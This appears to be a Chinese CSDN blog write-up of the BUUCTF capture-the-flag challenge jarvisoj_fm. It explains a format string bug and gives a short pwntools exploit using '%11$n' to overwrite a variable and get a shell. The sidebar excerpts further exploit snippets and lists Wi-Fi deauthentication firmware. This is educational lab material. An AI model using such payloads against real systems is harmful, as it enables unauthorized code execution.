BUUCTF-Pwn-jarvisoj_fm

于 2022-03-25 21:35:17 发布
阅读量2.6k 收藏
点赞数
分类专栏: Pwn CTF 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/123403066
版权
CTF 同时被 2 个专栏收录
29 篇文章 0 订阅
订阅专栏
Pwn
21 篇文章 0 订阅
订阅专栏

题目截图
在这里插入图片描述
常规检查
在这里插入图片描述
查看主函数,存在格式化字符串漏洞,利用该漏洞向x中写入4就能获得shell
在这里插入图片描述
找到变量buf在栈上的位置
在这里插入图片描述

exp

from pwn import*
p=remote('node4.buuoj.cn',27346) 
x_addr=0x804A02C
payload=p32(x_addr)+b'%11$n'
p.sendline(payload)
p.interactive()
餐桌上的猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 370
buuctf-pwn 001-016题wp
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
半岛铁盒的博客
08-05 355
简单的格式化字符串漏洞题目 32位,开启了canary和nx保护 知道以上条件就可以计算偏移了 得到偏移为11 from pwn import * r=remote('node3.buuoj.cn',25582) x_addr=0x804A02C payload=p32(x_addr)+"%11$n" r.sendline(payload) r.interactive() payload=p32(x_addr)+"%11$n" 因为要使x的值为4,写入的数据由%11$n前面的参数的长度决定,
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 375
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解题思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
BUUCTF-pwn(15)
njh18790816639的博客
02-13 2661
gyctf_2020_some_thing_interesting 经典UAF漏洞! Allocate申请函数! Free释放函数! 全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到malloc_hook地址。然后利用UAF漏洞修改malloc_hook为one_gadget,此时进行申请操作便可获取权限! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './gyctf_2
[BUUCTF-pwn] 0ctf_2017_char
weixin_52640415的博客
01-13 138
带检查的溢出 程序先把libc.so调入可读堆块中,地址固定0x5555e010,这里可以提供大量rop资源 用scanf读入,这里比较坑,0x20,0x09,0x0a,0x0b都不能输入,需要换成其它的 在最后调用函数里有strcpy会形成溢出,但是会检查每个字符都在31-126之间。 char *__cdecl sub_8048678(char *src) { char dest[28]; // [esp+Ch] [ebp-1Ch] BYREF return strcpy(dest,
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
buuoj Pwn writeup 191-195
yongbaoii的博客
06-12 497
191 huxiangbei_2019_hacknote 192 pwnable_simple_login 193 mrctf2020_spfa 194 360chunqiu2017_smallest 195 watevr_2019_voting_machine_1
栈迁移图解
qq_40410406的博客
11-11 1430
栈迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp栈空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行栈溢出攻击,所以需要另寻出路。 2 栈溢出长度不足以使用直接 ROP 3 栈溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了栈不可执行保护,就需要栈迁移到bss段或者data段或者其他栈位置执行我们的gadge
buuctf pwn wp(第一波)无脑AAAA系列
月阴荒的博客
03-20 990
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这篇文章是我把当初做了时的记录素材拿过来做的...
BUUCTF pwn
L0g1c的博客
01-30 1546
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3164
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 294
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 248
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
BUUCTF|pwn-jarvisoj_fm-wp
l2645470582_的博客
11-09 271
1.例行检查保护机制 我们看到开启了堆和栈保护 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串 我们看到关键字符串“/bin/sh” 3.我们看看main函数里面有什么 我们看到如果x == 4,程序就会执行system("/bin/sh"),拿到权限 这里是格式化字符串漏洞 x是全局变量,位置在data段上:x_addr = 0x0804A02C 我们看看参数在栈上的位置,我们发现aaaa的位置在第十一个 4....
BUUCTF pwn wp 26 - 30
fa1c4的blog
09-27 233
ciscn_2019_s_3 只有read和write, 用SROP打 srop漏洞 参考https://www.anquanke.com/post/id/217081 https://blog.csdn.net/qq_33976344/article/details/115787451 需要注意一下调用方式, 返回直接retn, 所以不弹rbp, 直接弹ret_addr, 另外需要一个gadget设置rax, 程序里是直接提供了的 from pwn import * url, port = 'n
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值